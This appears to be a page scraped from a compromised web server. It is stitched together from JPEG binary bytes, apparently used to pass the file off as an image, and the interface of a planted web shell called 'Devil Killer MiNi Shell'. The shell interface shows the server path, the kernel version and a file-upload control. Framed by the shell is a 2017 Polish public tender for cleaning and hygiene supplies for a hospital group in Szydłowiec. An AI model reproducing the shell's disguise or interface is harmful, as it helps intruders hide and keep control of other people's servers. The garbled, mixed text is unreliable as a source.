JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170424/72246-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zoz.szydlowiec.pl' target='_blank'>http://www.zoz.szydlowiec.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 72246 - 2017
              z dnia 2017-04-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Szydłowiec: ,,Dostawa środków czystości i higieny dla Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Szydłowcu''<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej w Szydłowcu, krajowy numer identyfikacyjny
              67012987000000, ul.
              ul. Wschodnia 
              23,
              26500  
              Szydłowiec, woj.
              mazowieckie, państwo
              Polska, tel.
              486 170 300, e-mail
              digitm@wp.pl, faks
              486 170 980.
              <br />
              Adres strony internetowej (URL): www.zoz.szydlowiec.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Samodzielny Publiczny Zespół Zakładów Opieki Zdrowotnej </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br />Nie dotyczy.</div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.zoz.szydlowiec.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zoz.szydlowiec.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  tak
                <br />
                adres
                <br />digitm@wp.pl</div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty i umowy- przewidziana jest wyłącznie forma pisemna. <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br />Samodzielny Publiczny Zespół Zakłaów Opieki Zdrowotnej w Szydłowcu, ul. Wschodnia 23, 26-500 Szydłowiec</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>,,Dostawa środków czystości i higieny dla Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Szydłowcu''<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest dostawa środków czystości i higieny dla Samodzielnego Publicznego Zespołu Zakładów Opieki Zdrowotnej w Szydłowcu zgodnie z załącznikami nr 6 i 6a do SIWZ. w okresie 36 miesięcy z przewidywanym terminem rozpoczęcia dostawy 02.06.2017 r. Podana ilość dostawy to wartość szacunkowa, wskazana w celu wyboru najkorzystniejszej oferty. Zamawiający zastrzega sobie prawo niewykorzystanie w okresie realizacji pełnej ilości zapotrzebowania określonego w SIWZ, jednak nie mniej niż 80 %. 


PRZEDMIOT ZAMÓWIENIA

GRUPA 1
Lp	Nazwa artykułu	Ilość/ szt./
op./ pak./ rolk./pary 
1	2	4
1.		Komplet MOP (wiadro z tworzywa sztucznego z mocnym uchwytem, jednokomorowe 10 l z koszykiem (wyciskaczem), końcówka MOP bawełniana, wkręcana, kij drewniany dł 150 cm z gwintem.	90 szt.
2.		Kij do szczotki/mopa drewniany z gwintem, dł. 150 cm.	120 szt.
3.		Końcówka MOP bawełniana, wkręcana.	150 szt.
4.		Wiadro z tworzywa sztucznego z mocnym uchwytem, jednokomorowe 10 l                          z koszykiem (wyciskaczem).	120 szt.
5.		Krem do rąk o właściwościach nawilżających i odżywczych. Zawierający w składzie glicerynę i inne składniki odżywczo  nawilżające. Op. 100 ml.	150 szt.
6.		Mydło w kostce o właściwościach nawilżających i neutralnym pH dla skóry, przebadane dermatologiczne  100 g.	720 szt.
7.		Mydło szare kostka  op. 200 ml.	450 szt.
8.		Mydło w płynie, o konsystencji kremu, łagodne dla skóry rąk, o właściwościach nawilżających, przebadane dermatologicznie, opakowanie 5 l.	380 szt.
9.		Maszynka do golenia, do jednorazowego użytku, dwuostrzowa.	450 szt.
10.		Papier toaletowy celulozowy biały, dwuwarstwowy, dł. 30  32 mb,                                 szer. 9,5  10 cm. 1 op.  8 rolek	1500 op.
11.		Pasta BHP 1 op.  500 g.	300 szt.
12.		Mleczko do czyszczenia wszystkich powierzchni emaliowanych, ceramicznych                        i ze stali nierdzewnej. Zawierające system wybielający. Usuwający oporny brud nie rysując czyszczonej powierzchni. O gęstości nie mniejszej niż 1,5 g/cm3                             (w temp. 20°). Op. 750 ml.	360 szt.
13.		Preparat uniwersalny do mycia i pielęgnacji gładkich powierzchni (kafle, podłogi)
Wymagania:
- niepozostawiający smug,
- skuteczne czyszczący,
- o przyjemnym nie drażniącym zapachu,
- mycie ręczne od 50 do 100 ml na 10 l wody,
- wartość pH od 7,5  8,
- należy dołączyć kartę charakterystyki preparatu,
- op. 1 l.	360 szt.
14.		Preparat do nabłyszczania powierzchni z linoleum, PCV, lastriko itp. odporny na ścieranie, zawierający substancje zapachowe. op. 0,5 l.	360 szt.
15.		Płyn do ręcznego mycia naczyń o pH neutralnym dla skóry rąk. Skutecznie usuwający tłuszcz. Gęstość względna nie mniejsza niż 1,045 kg/cm3. 
Stosowanie: 5 ml na 5l wody. Op. 1L.	1200 op.
16.		Płyn do mycia szyb op. 0,75 l ze spryskiwaczem. Dobrze usuwający silne zabrudzenia, nie pozostawiający zacieków i smug. Z formułą antystatyczną. pH 8  8,5.                       Skład chemiczny: woda deminarlizowana, alkohol, ocet rozpuszczalniki rozpuszczalne w wodzie. Płyn o przyjemnym nie drażniącym zapachu,
należy dołączyć kartę charakterystyki.	1200 op.
17.		Żel czyszcząco  dezynfekujący do sanitariatów o działaniu bakteriobójczym, grzybobójczym  i wirusobójczym, skutecznie usuwającym brud. O gęstości względnej nie mniejszej niż 1,1 kg/l.  W składzie: podchloryn sodu (nie mniej niż 4,8/100g), &lt; 5% związków wybielających na bazie chloru, niejonowe środki powierzchniowo czynne. Op. 750 ml.	360 szt.
18.		Żel do udrażniania instalacji sanitarnych. Docierający przez stojącą wodę do zatorów                   i samoczynnie je usuwa i likwiduje nieprzyjemny zapach. Rozpuszcza wszelkie osady tłuszczowe, odpadki kuchenne oraz inne substancje organiczne. Zawiera substancje             o działaniu antybakteryjnym i grzybobójczym. Op. 500 ml.	300 szt.
19.		Granulat do udrażniania instalacji sanitarnych. Docierający przez stojącą wodę                    do zatorów i samoczynnie je usuwa i likwiduje nieprzyjemny zapach. Rozpuszcza wszelkie osady tłuszczowe, odpadki kuchenne oraz inne substancje organiczne. Zawiera substancje o działaniu antybakteryjnym i grzybobójczym. Op. 500 ml.	300 szt.
20.		Ręcznik papierowy typu  ZZ, jednowarstwowe, gofrowany, wodoutwardzalny, rozmiar 23 x 25 cm, kolor: biały, gramatura 38 - 40 g/m2, op. 200 listków.	15 000 pakietów
21.		Ręcznik papierowy w rolce, dwuwarstwowy, chłonny i wytrzymały na rozdzieranie, podzielony na listki, 100% celulozy, gofrowany, kolor: biały,                              długość ok. 100 m, gramatura 18  20 g/m2.	600 rolek
22.		Rękawice gospodarcze przeznaczone do prac domowych, sanitarnych.                       Wykonane z lateksu i kauczuku naturalnego. Gramatura 55 - 60 g, wewnętrzna powierzchnia rękawic pokryta flokiem (pyłem bawełnianym), na części chwytnej chropowata struktura, odporne na rozciąganie, wysoka odporność            na detergenty i środki piorące. op. 1 para.	720 par
23.		Rękawice winylowe, surowiec: polichlorek winylu, środek pudrujący: skrobia (mączka) kukurydziana, powierzchnia: gładka, wykończenie mankietu: równomiernie rolowany brzeg, brak zawartość protein lateksu, jednorazowego użytku.	720 par
24.		Szczotka do podłogi, nakręcona na kij, na drewnianych oprawach z otworem gwintowany, nabijane surowcem PET/PPN/szczecina/ mieszanka z włosia naturalnego z dodatkiem PET lub PPN, rozmiar - 40 cm.	30 szt.
25.		Miotły typu "Ulicówka" produkowane  na oprawach z drewna bez uchwytu, nabijane surowcem PET/PPN/PCV z długim i włosem. Długość 30 cm.	80 szt.
26.		Szczotka do WC (toaletowa). Wykonana z tworzywa sztucznego ze specjalną końcówką do czyszczenia wewnętrznej części krawędzi muszli.	150 szt.
27.		Zmiotka z szufelką, wykonane z tworzywa sztucznego, szufelka zakończona gumą.             Wymiar 295 x 195 x 305.	90 szt.
28.		Ścierka z mikrofibry, uniwersalna. Doskonale zbierająca kurz i brud. Mająca specjalną budowę mikrowłókien. Nie pozostawiająca smug i śladów po wytarciu. Nadaje się            do czyszczenia na sucho i na mokro. Wymiar 30 x 40.	1800 szt.
29.		Ścierka do podłogi 100 % bawełna. Wzmocniona, o grubym splocie i dużej gęstości.  Pozostawiająca niewiele włókien, zwiększona trwałość, nasiąkliwość min. 70%.
Wymiar 70 x 70 cm.	1800 szt.
30.		Ścierka do podłogi wiskozowa. Nie pozostawia włókien , dobrze zbiera wodę.                     Wymiar 50 x 70 cm.	1800 szt.
31.		Tabletki do mycia mechanicznego naczyń z właściwościami nabłyszczającymi                1 op. 100 tabletek. Usuwa najtrudniejsze plamy, zaschnięte jedzenie, zaplamienia, tłuszcz, zabrudzenia po herbacie, odpornych zabrudzeń. Ochrona przed osadzaniem się kamienia w zmywarce.	80 op.
32.		Preparat do zmywarek  sól ziarnista. Całkowicie wolna od zanieczyszczeń. Usuwająca kamień i zapobiegający osadzaniu się kamienia, zmiękczająca wodę. Op. 1,5 kg.	60 op.
33.		Worki na odpady 35 l z taśmą ściągającą, wzmocnione, grubość foli min.       0,04 mikrony, wykonane z foli LDPE. Op. 25 szt.	1800 op.
34.		Worki na odpady 60 l z taśmą ściągającą, wzmocnione, grubość foli min.             0,04 mikrony, wykonane z foli LDPE.  Op. 25 szt.	1800 op.
35.		Worki na odpady 120 l z taśmą ściągającą, wzmocnione, grubość foli min.           0,04 mikrony, wykonane z foli LDPE. Op. 25 szt.	1800 op.
36.		TTS Wkład do mopa bawełniany do stelaża płaski zapinany speedy 40 cm	50 szt.
37.		Środek piorąco  dezynfekujący bez zawartości fosforanów.
Wymagania:
- pierze, wybiela, dezynfekuje,
- umieszczony w wykazie PZH  do chemiczno  termicznej dezynfekcji prania przy 65C,
- atest PZH (dołączyć),
- wpis do rejestru środków biobójczych
- op. 15 kg.	600 kg

GRUPA 2
Lp.	Nazwa artykułu	Ilość/ szt.

1	2	3
1.		Pieluchomajtki Medium/2 (75 x 110)	22 500
2.		Pieluchomajtki LARGE 3  (100 x 150)	8 000
<br /><br /><b>II.5) Główny kod CPV: </b>39830000-9<br /><b> Dodatkowe kody CPV:</b>39831250-3,
                39831240-0,
                33770000-8,
                39720000-5,
                39831000-6<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 36<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: 
             1) Kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile  wynika to z odrębnych przepisów.
 - Zamawiający nie określa szczegółowych wymagań w powyższym zakresie. Wystarczającym będzie  złożenie oświadczenia o spełnieniu warunków udziału                        w postępowaniu- wg wzoru stanowiącego  załącznik nr 3 do SIWZ.  
                          2) Sytuacji ekonomicznej i finansowej 
                                  Nie dotyczy. 
                          3)  Zdolności technicznej i zawodowej 
                                   Nie dotyczy. 
<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie uszczegóławia wymagań. <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie uszczegóławia wymagań. <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Oświadczenie Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej zał. 4 do SIWZ. 
3. Wykonawca w terminie 3 dni od dnia zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5, przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art.  24 ust. 1 pkt 23 ustawy PZP. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadza do zakłócenia konkurencji w postępowaniu                                                             o udzielenie zamówienia. Propozycja treści  oświadczenia została zamieszczona                  w niniejszej SIWZ ( Załącznik nr 4).
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Nie dotyczy. <br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br />Nie dotyczy.</div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">Nie dotyczy. </div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Zamawiający przed udzieleniem zamówienia wezwie wykonawcę, którego oferta zostanie wybrana do złożenia, że nie podlega wykluczeniu na podstawie ust. 24 ust. 5 pkt. 1, tj. odpisu z właściwego rejestru lub z centralnej ewidencji i informacji                           o działalności  gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy. 

</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
